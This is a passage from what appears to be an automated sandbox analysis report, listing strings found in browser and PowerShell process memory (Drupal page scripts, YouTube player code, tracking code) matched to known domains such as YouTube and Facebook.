src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340699100.000028EC065E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: this.dF.WD&&(B.authuser=this.dF.WD);this.dF.pageId&&(B.pageid=this.dF.pageId);isNaN(this.cryptoPeriodIndex)||(B.cpi=this.cryptoPeriodIndex.toString());var h=(h=/_(TV|STB|GAME|OTT|ATV|BDP)_/.exec(g.Va()))?h[1]:"";h==="ATV"&&(B.cdt=h);this.V=B;this.V.session_id=R;this.N=!0;this.U.flavor==="widevine"&&(this.V.hdr="1");this.U.flavor==="playready"&&(z=Number(zk(z.experiments,"playready_first_play_expiration")),!isNaN(z)&&z>=0&&(this.V.mfpe=""+z),this.N=!1);z="";g.tc(this.U)?NE(this.U)?(R=T.U)&&(z="https://www.youtube.com/api/drm/fps?ek="+ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: tionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: unction(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: urrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: var M6={};var HF7={X2:[{RD:/Unable to load player module/,weight:20},{RD:/Failed to fetch/,weight:500},{RD:/XHR API fetch failed/,weight:10},{RD:/JSON parsing failed after XHR fetch/,weight:10},{RD:/Retrying OnePlatform request/,weight:10},{RD:/CSN Missing or undefined during playback association/,weight:100},{RD:/Non-recoverable error. Do not retry./,weight:0},{RD:/Internal Error. Retry with an exponential backoff./,weight:0},{RD:/API disabled by application./,weight:0}],Zz:[{callback:GDP,weight:500}]};var Pfr=/[&\?]action_proxy=1/,$el=/[&\?]token=([\w-]*)/,xeX=/[&\?]video_id=([\w-]*)/,vFY=/[&\?]index=([\d-]*)/,DeP=/[&\?]m_pos_ms=([\d-]*)/,KYd=/[&\?]vvt=([\w-]*)/,Uez="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),kDB="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),QdB={android:"ANDROID", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: var TH=function(a,b,c,d,e){var f=RE("fsl",c?"nv.mwt":"mwt",0),g;g=c?RE("fsl","nv.ids",[]):RE("fsl","ids",[]);if(!g.length)return!0;var h=WE(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);O(121);if(m==="https://www.facebook.com/tr/")return O(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!nD(h,pD(b, equals www.facebook.com (Facebook)
Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF263000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com=1 equals www.linkedin.com (Linkedin)
Source: chrome.exe, 00000000.00000002.2502048114.000028EC06D54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com(N equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498572805.000028EC05C20000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com@Z equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comED equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489024413.000028EC03E2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485567217.000028EC03804000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comL equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comd.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470845062.000028EC026BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.come.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.commcaontent-producer.web.app equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comofpalmlakkmbjdnl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comq equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323044133.000028EC04024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com|@G equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: xmlhttprequest>6https://www.youtube.com/youtubei/v1/log_event?alt=json7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: yOb=function(B,z){if(!B.T["0"]){var T=new N_("0","fakesb",{video:new uF(0,0,0,void 0,void 0,"auto")});B.T["0"]=z?new XU(new g.QP("http://www.youtube.com/videoplayback"),T,"fake"):new Lj(new g.QP("http://www.youtube.com/videoplayback"),T,new PL(0,0),new PL(0,0))}}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: yer_ias.vflset/en_US/base.js\" name=\"player/base\" nonce=\"x3amAjrbTQzP1ftESc85Hw\"></script><script nonce=\"\">writeEmbed();</script><script nonce=\"\">if (window.ytcsi) {ytcsi.infoGel({serverTimeMs: 58.0 }, '');}</script><noscript><div class=\"player-unavailable\"><h1 class=\"message\">An error occurred.</h1><div class=\"submessage\"><a href=\"https://www.youtube.com/watch?v=gobWGqPjLSQ\" target=\"_blank\">Try watching this video on www.youtube.com</a>, or enable JavaScript if it is disabled in your browser.</div></div></noscript></body>","favicon":"","currentUrl":"https://fountainofhealth.ca/en","listArrString":[null,"https://www.youtube.com/watch?v=gobWGqPjLSQ","https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F"],"imgArrString":["https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/png;base64,AA==","https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADGCAYAAAAT+OqFAAAAdklEQVQoz42QQQ7AIAgEF/T/D+kbq/RWAlnQyyazA4aoAB4FsBSA/bFjuF1EOL7VbrIrBuusmrt4ZZORfb6ehbWdnRHEIiITaEUKa5EJqUakRSaEYBJSCY2dEstQY7AuxahwXFrvZmWl2rh4JZ07z9dLtesfNj5q0FU3A5ObbwAAAABJRU5ErkJggg==","https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: yt3.ggpht.comtionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: z.customBaseYoutubeUrl:B.BASE_YT_URL)||"")||lYK(this.yl)||this.protocol+"://www.youtube.com/";b=z?z.eventLabel:B.el;R="detailpage";b==="adunit"?R=this.W?"embedded":"detailpage":b==="embedded"||this.J?R=b9(R,b,L6Y):b&&(R="embedded");this.XE=R;PAY();b=null;R=z?z.playerStyle:B.ps;W=g.F5(CiP,R);!R||W&&!this.J||(b=R);this.playerStyle=b;this.X=g.F5(CiP,this.playerStyle);this.houseBrandUserStatus=z==null?void 0:z.houseBrandUserStatus;this.UE=this.X&&this.playerStyle!=="play"&&this.playerStyle!=="jamboard"; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: z=this.api.K();B=this.api.getVideoData();var T="";z.Y||(z=g.Of(z),z.indexOf("www.")===0&&(z=z.substring(4)),T=g.ev(B)?"Watch on YouTube Music":z==="youtube.com"?"Watch on YouTube":g.Ix("Watch on $WEBSITE",{WEBSITE:z}));this.updateValue("title",T)}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}mic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}CuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"if (document.fonts && document.fonts.load) {document.fonts.load(\"400 10pt Roboto\", \"E\"); document.fonts.load(\"500 10pt Roboto\", \"E\");}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
